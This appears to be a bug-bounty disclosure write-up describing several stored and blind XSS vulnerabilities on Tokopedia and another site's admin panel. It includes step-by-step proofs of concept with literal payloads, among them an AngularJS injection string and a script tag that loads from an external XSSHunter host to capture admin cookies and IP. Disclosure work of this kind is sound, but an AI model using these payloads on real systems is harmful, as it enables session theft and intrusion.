Multiple Stored XSS On Tokopedia

So, It’s just old bug who I have been reported around 2018. I’ll share what I found on Tokopedia. Just in case you need some article to go to sleep. But it’ll just short description and PoC Here it is :

Stored XSS On Complain Product (Keterangan Bukti Field)

This vulnerable perform on feature complain product, When buyer not satisfied with the stuff who has been buy by buyer. Buyer can complain with upload some Image. And the vulnerability is on Description image field.

PoC :

  1. Go to complain menu
  2. Upload some image
  3. Input Payload on description of image ( <img src=x onerror=alert(document.domain)> )
  4. Payload will be execute when user navigate to the resolution menu.

Video :

Stored XSS On Location Shop (m.tokopedia.com )

This vulnerable on Location Shop Parameter at https://m.tokopedia.com/ . So, this bug is just set the location shop to payload. And when someone navigate to the Shop detail. It’ll pop up the XSS.

PoC :

  1. Open The mobile apps Tokopedia
  2. Edit the location of shop to XSS payload ( <img src=x onerror=alert(document.domain)> )
  3. Open the location via browser

Video :

Stored XSS via AngularJS Injection On Etalase Name

Vulnerability exist because Tokopedia install the AngularJs old version and not filtering the illegal character very well. So, I just Insert the payload of AngularJs Injection to Etalasane Name and XSS will be fired up.

PoC :

  1. Go To Add product
  2. Set the Etalase Name to AngularJs Payload ( {{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=1} } };alert(document.domain)//’);}} )
  3. Save, And Open the product

Video :

Blind XSS on CS System ( Tokocash )

Tokopedia have some CS system, use the salesforce application. And when having some discussion between Tokopedia & Salesforce, the root cause is on the Tokopedia Custom Code.

PoC :

  1. Login Tokocash.com
  2. REquest new ticket with payload of XSS Hunter
  3. Wait for execute payload on XSSHunter Dashboard.

Actually I have found more Stored XSS, but sadly that’s mark as Duplicate. I just fresh Bug who has been marked as valid only.

Thanks! Get in touch with me on Twitter : Apapedulimu

Blind XSS in Admin Panel on Name Parameter

Description :

Blind XSS is fired up on admin panel on name parameter, While the register there’s a field Full Name, I fill it with XSS Payload, I use XSSHunter to execute this. In a Next day I’ve found my XSS result on XSShunter dashboard through their admin Panel, I able to showing admin IP / Cookies / Path of admin, and etc. Maybe the admin will activate / reviewing the user registration.

PoC :

1. Register new account and fill the Field Full name with Payload From XSSHunter. ( “><script src=https://apapedulim.xss.ht></script> )
2. Complete the registration.
3. Wait on the Next Day.

Impact :

Getting the IP / Cookies / Path Of admin of the XSS and able to get the list of other customer details like Name, IDs.

How Do you Know it’s Blind XSS on admin page?

Actually, Im not sure at the first time I found, After registering my account, I get the email from website to confirm my account, And my name going to ">  in my recent test, I use that payload just showing "> and XSS payload will execute,

Verify my email address from website.

I assume It’ll be Stored XSS and will be fired up on admin panel, So, I wait it, And got the response from admin panel.

Note : The team request limited disclosure.

I contacted the team via their contact page. And got positive report from them, After seeing my report they fix the vuln and will send me some SWAG. Yay!

Thanks.